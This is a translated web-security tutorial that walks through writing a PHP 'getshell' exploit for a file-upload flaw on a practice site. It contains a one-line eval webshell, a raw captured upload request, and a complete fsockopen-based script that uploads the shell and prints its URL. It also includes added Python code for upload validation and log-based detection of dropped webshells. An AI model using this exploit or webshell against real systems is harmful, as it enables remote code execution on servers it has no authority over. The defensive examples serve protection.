
[Original] Web Security, Chapter 7: Exploit Writing, Part 04: Writing a getshell Exploit


getshell usually means obtaining privileges on a website or its server through some command or an upload vulnerability. In web security it is mostly upload vulnerabilities: you upload a trojan, i.e. a webshell (getwebshell).

Open the 暗月 practice target and test its upload vulnerability.

http://www.moontester.com/upload.php


To test the upload vulnerability you can upload an image trojan directly; capture the request with Burp Suite:

POST /upload.php HTTP/1.1
Host: www.moontester.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://www.moontester.com/upload.php
Content-Type: multipart/form-data; boundary=---------------------------11819270641735
Content-Length: 311
Connection: close
Cookie: PHPSESSID=4f6vnfrh0pkiedfdkf5uap6po5
Upgrade-Insecure-Requests: 1

-----------------------------11819270641735
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/gif

<?php eval($_POST['cmd']);?>
-----------------------------11819270641735
Content-Disposition: form-data; name="sub"

上传
-----------------------------11819270641735--

A packet captured with Wireshark; this kind of packet is the most raw form of the request.


Writing the getshell in PHP requires the sockets extension; make sure sockets are enabled in php.ini.

[php]
<?php
// Open a TCP connection to port 80, send the raw packet and return the whole response.
function http_send($host, $packet){
    $resp = '';                      // initialise the buffer (undefined in the original, which raises a notice)
    $sock = fsockopen($host, 80);
    if(!$sock){
        print "\n[-] No response from {$host}:80 Trying again...";
        $sock = fsockopen($host, 80);
        if(!$sock){
            return $resp;            // give up after one retry instead of writing to a bad handle
        }
    }
    fputs($sock, $packet);
    // Read until the server closes the connection (the packet sends Connection: close).
    while (!feof($sock)) {
        $resp .= fread($sock, 1024);
    }
    fclose($sock);
    return $resp;
}
?>
[/php]

This code sends a hand-built HTTP packet; on success it returns the page content.

[php]
<?php
// Build the raw multipart/form-data POST that uploads $filename to /upload.php.
function data($host,$filename){
    $boundary = "---------------------------86531354118821";
    // Each body part starts with "--" + boundary; the closing delimiter also ends with "--".
    $payload  = "--{$boundary}\r\n";
    $payload .= "Content-Disposition: form-data; name=\"file\"; filename=\"{$filename}\"\r\n";
    $payload .= "Content-Type: image/jpeg\r\n\r\n";
    $payload .= 'GIF89a'."\r\n".'<?php eval($_POST[a]) ?>'."\r\n";
    $payload .= "--{$boundary}\r\n";
    $payload .= "Content-Disposition: form-data; name=\"sub\"";
    $payload .= "\r\n\r\n";
    $payload .= "12132\r\n";
    $payload .= "--{$boundary}--\r\n";
    $packet  = "POST /upload.php HTTP/1.1\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Content-Type: multipart/form-data; boundary={$boundary}\r\n";
    $packet .= "Content-Length: ".strlen($payload)."\r\n";
    $packet .= "Connection: close\r\n\r\n";
    $packet .= $payload;
    return $packet;
}
?>
[/php]

This part builds the HTTP packet; the line -----------------------------86531354118821-- is the closing delimiter that marks the end of the form submission.
$payload .= 'GIF89a'."\r\n".'<?php eval($_POST[a]) ?>'."\r\n";
This part is the content of the image trojan you are uploading.
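As an added example (not the author's code, and not the target's upload.php, whose source the page does not show), the following Python does what a server-side validator should do with the captured request and the payload just described: it parses the multipart body, then applies the checks that stop such a file from being stored as an executable script, an extension allowlist, an image-signature check, a cross-check of declared type, extension and signature, and a scan for script tags. The request bytes are reconstructed from the capture above with CRLF restored; the legitimate GIF and the other sample parts are constructed here.

```python
import re

# Constructed sample: the upload request from the Burp capture above, with CRLF
# line endings restored and the browser headers that play no part in validation
# dropped. Boundary, field names, filename and file body are the captured ones.
BOUNDARY = "-" * 27 + "11819270641735"
RAW_REQUEST = (
    "POST /upload.php HTTP/1.1\r\n"
    "Host: www.moontester.com\r\n"
    f"Content-Type: multipart/form-data; boundary={BOUNDARY}\r\n"
    "Connection: close\r\n"
    "\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="file"; filename="1.php"\r\n'
    "Content-Type: image/gif\r\n"
    "\r\n"
    "<?php eval($_POST['cmd']);?>\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="sub"\r\n'
    "\r\n"
    "上传\r\n"
    f"--{BOUNDARY}--\r\n"
).encode("utf-8")

# Allowed extensions and the image type each one must actually contain.
EXT_KIND = {"jpg": "jpeg", "jpeg": "jpeg", "png": "png", "gif": "gif"}
# Leading bytes (file signatures) of those image types.
MAGIC = {
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
SCRIPT_MARKER = re.compile(rb"<\?(?:php|=)|<script\b", re.IGNORECASE)


def parse_multipart(raw: bytes) -> list:
    """Split a raw multipart/form-data request into {'headers', 'content'} parts."""
    head, _, body = raw.partition(b"\r\n\r\n")
    m = re.search(rb"boundary=([^\r\n;]+)", head)
    if not m:
        raise ValueError("not a multipart/form-data request")
    delim = b"--" + m.group(1).strip()        # body delimiter = "--" + boundary
    parts = []
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):           # closing delimiter: boundary + "--"
            break
        if chunk.startswith(b"\r\n"):         # CRLF that ends the delimiter line
            chunk = chunk[2:]
        hdr, _, content = chunk.partition(b"\r\n\r\n")
        if content.endswith(b"\r\n"):         # CRLF before the next delimiter
            content = content[:-2]
        headers = {}
        for line in hdr.split(b"\r\n"):
            name, _, value = line.partition(b":")
            if name:
                headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
        parts.append({"headers": headers, "content": content})
    return parts


def filename_of(part: dict) -> str:
    """Client-supplied filename, reduced to its basename (never a path)."""
    cd = part["headers"].get("content-disposition", "")
    m = re.search(r'filename="([^"]*)"', cd)
    return (m.group(1) if m else "").replace("\\", "/").rsplit("/", 1)[-1]


def validate_upload(part: dict) -> list:
    """Return the reasons to reject an uploaded file; an empty list means accept."""
    problems = []
    name = filename_of(part)
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if ext not in EXT_KIND:
        problems.append(f"extension {ext!r} is not on the allowlist")
    content = part["content"]
    kind = next((k for sig, k in MAGIC.items() if content.startswith(sig)), None)
    if kind is None:
        problems.append("content does not start with a known image signature")
    declared = part["headers"].get("content-type", "").split(";")[0].strip().lower()
    if kind is not None and declared != f"image/{kind}":
        problems.append(f"declared {declared or '(none)'} but content is {kind}")
    if kind is not None and ext in EXT_KIND and EXT_KIND[ext] != kind:
        problems.append(f"extension {ext!r} does not match content type {kind}")
    if SCRIPT_MARKER.search(content):
        problems.append("file body contains a server-side script tag")
    return problems


def check_request(raw: bytes) -> dict:
    """Map every file field in a raw request to its list of problems."""
    return {
        filename_of(p): validate_upload(p)
        for p in parse_multipart(raw)
        if "filename=" in p["headers"].get("content-disposition", "")
    }


if __name__ == "__main__":
    for name, problems in check_request(RAW_REQUEST).items():
        print(name, "->", "accept" if not problems else "; ".join(problems))
```

The result URL later on the page shows why the last checks matter: the target stores the file under a hash plus the original name, so the file keeps its .php extension, and the GIF89a prefix in the exploit's payload is enough to satisfy a check that looks only at the signature. A validator that also forces the stored extension to come from EXT_KIND, stores under a server-generated name, and keeps the upload directory free of script execution leaves no execution path even when one check is fooled.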
The full code:

[php]
<?php
// Open a TCP connection to port 80, send the raw packet and return the whole response.
function http_send($host, $packet){
    $resp = '';
    $sock = fsockopen($host, 80);
    if(!$sock){
        print "\n[-] No response from {$host}:80 Trying again...";
        $sock = fsockopen($host, 80);
        if(!$sock){
            return $resp;
        }
    }
    fputs($sock, $packet);
    while (!feof($sock)) {
        $resp .= fread($sock, 1024);
    }
    fclose($sock);
    return $resp;
}

// Build the raw multipart/form-data POST that uploads $filename to /upload.php.
function data($host,$filename){
    $boundary = "---------------------------86531354118821";
    $payload  = "--{$boundary}\r\n";
    $payload .= "Content-Disposition: form-data; name=\"file\"; filename=\"{$filename}\"\r\n";
    $payload .= "Content-Type: image/jpeg\r\n\r\n";
    $payload .= 'GIF89a'."\r\n".'<?php eval($_POST[a]) ?>'."\r\n";
    $payload .= "--{$boundary}\r\n";
    $payload .= "Content-Disposition: form-data; name=\"sub\"";
    $payload .= "\r\n\r\n";
    $payload .= "12132\r\n";
    $payload .= "--{$boundary}--\r\n";
    $packet  = "POST /upload.php HTTP/1.1\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Content-Type: multipart/form-data; boundary={$boundary}\r\n";
    $packet .= "Content-Length: ".strlen($payload)."\r\n";
    $packet .= "Connection: close\r\n\r\n";
    $packet .= $payload;
    return $packet;
}

$filename = "moon.php";
$host = "www.moontester.com";
print http_send($host,data($host,$filename));
[/php]

The filename:
$filename = "moon.php";

The target host:
$host = "www.moontester.com";

Print the content returned after the upload:
print http_send($host,data($host,$filename));

Run it and you get the result shown in the figure.


The output in cmd contains a lot of content that is not what we want, so we cut the webshell path out of the response and return only that. The full exploit is as follows:


[php]
<?php
// Open a TCP connection to port 80, send the raw packet and return the whole response.
function http_send($host, $packet){
    $resp = '';
    $sock = fsockopen($host, 80);
    if(!$sock){
        print "\n[-] No response from {$host}:80 Trying again...";
        $sock = fsockopen($host, 80);
        if(!$sock){
            return $resp;
        }
    }
    fputs($sock, $packet);
    while (!feof($sock)) {
        $resp .= fread($sock, 1024);
    }
    fclose($sock);
    return $resp;
}

// Build the raw multipart/form-data POST that uploads $filename to /upload.php.
function data($host,$filename){
    $boundary = "---------------------------86531354118821";
    $payload  = "--{$boundary}\r\n";
    $payload .= "Content-Disposition: form-data; name=\"file\"; filename=\"{$filename}\"\r\n";
    $payload .= "Content-Type: image/jpeg\r\n\r\n";
    $payload .= 'GIF89a'."\r\n".'<?php eval($_POST[a]) ?>'."\r\n";
    $payload .= "--{$boundary}\r\n";
    $payload .= "Content-Disposition: form-data; name=\"sub\"";
    $payload .= "\r\n\r\n";
    $payload .= "12132\r\n";
    $payload .= "--{$boundary}--\r\n";
    $packet  = "POST /upload.php HTTP/1.1\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Content-Type: multipart/form-data; boundary={$boundary}\r\n";
    $packet .= "Content-Length: ".strlen($payload)."\r\n";
    $packet .= "Connection: close\r\n\r\n";
    $packet .= $payload;
    return $packet;
}

$filename = "moon.php";
$host = "www.moontester.com";
$html_str = http_send($host,data($host,$filename));

// Pull the stored path out of the "Stored in: ..." text in the response page.
if (preg_match("/Stored in: (.*?)</", $html_str, $m)) {
    echo "http://".$host."/".$m[1];
} else {
    echo "false";
}
[/php]

preg_match is PHP's regular-expression function, used to match or filter content.


In the end you get http://www.moontester.com/upload/4a2246d3a2fb16824a51d5e789ad553bmoon.php
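As an added detection example (not from the page, and in Python rather than the page's PHP), the URL above shows what a successful drop looks like from the server's side: a POST to /upload.php followed shortly by a request for a .php file under /upload/. The function below scans web server access logs for exactly that, flagging any request for a script file in the upload directory and noting whether the same client posted to the upload handler within a time window beforehand. The log lines are constructed in Apache combined format with RFC 5737 documentation addresses; the path in the second line is the stored-file path the page reports.

```python
import re
from datetime import datetime, timedelta

# Constructed sample (Apache combined log format, RFC 5737 documentation addresses).
# Line 2 uses the stored-file path that the page's exploit output reports.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2019:12:00:01 +0800] "POST /upload.php HTTP/1.1" 200 1532 "http://www.moontester.com/upload.php" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2019:12:00:03 +0800] "POST /upload/4a2246d3a2fb16824a51d5e789ad553bmoon.php HTTP/1.1" 200 87 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2019:12:05:44 +0800] "GET /upload/photo.jpg HTTP/1.1" 200 48213 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Mar/2019:13:10:00 +0800] "GET /upload/old.php HTTP/1.1" 404 209 "-" "curl/7.64.0"
203.0.113.5 - - [10/Mar/2019:14:30:00 +0800] "POST /upload.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Extensions the web server would hand to the PHP interpreter.
EXEC_EXT = re.compile(r"\.(php\d?|phtml|phar)(?:\?|$)", re.IGNORECASE)
UPLOAD_DIR = "/upload/"        # where accepted files are stored (from the page's result URL)
UPLOAD_HANDLER = "/upload.php"  # the upload endpoint (from the page's capture)


def parse_line(line: str):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%d/%b/%Y:%H:%M:%S %z")
    ev["status"] = int(ev["status"])
    return ev


def find_script_in_upload_dir(lines, window: timedelta = timedelta(minutes=10)) -> list:
    """Flag every request for a script file under the upload directory.

    Each hit records whether the same client POSTed to the upload handler
    within `window` beforehand, i.e. the upload-then-execute sequence.
    """
    last_upload = {}   # client ip -> time of its most recent POST to the upload handler
    hits = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        if ev["method"] == "POST" and ev["path"].split("?")[0] == UPLOAD_HANDLER:
            last_upload[ev["ip"]] = ev["ts"]
            continue
        if ev["path"].startswith(UPLOAD_DIR) and EXEC_EXT.search(ev["path"]):
            prior = last_upload.get(ev["ip"])
            hits.append({
                "ip": ev["ip"],
                "path": ev["path"],
                "status": ev["status"],
                "after_upload": prior is not None and ev["ts"] - prior <= window,
            })
    return hits


if __name__ == "__main__":
    for hit in find_script_in_upload_dir(SAMPLE_LOG.splitlines()):
        print(hit)
```

A hit with status 200 and after_upload set is the strongest signal, since it means the server actually executed a script that a client had just uploaded; a 404 for a script path under /upload/ is still worth reviewing, as it is a probe for a file that no legitimate client would ask for.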


Original article by mOon. If reposting, please cite the source: https://www.moonsec.com/546.html
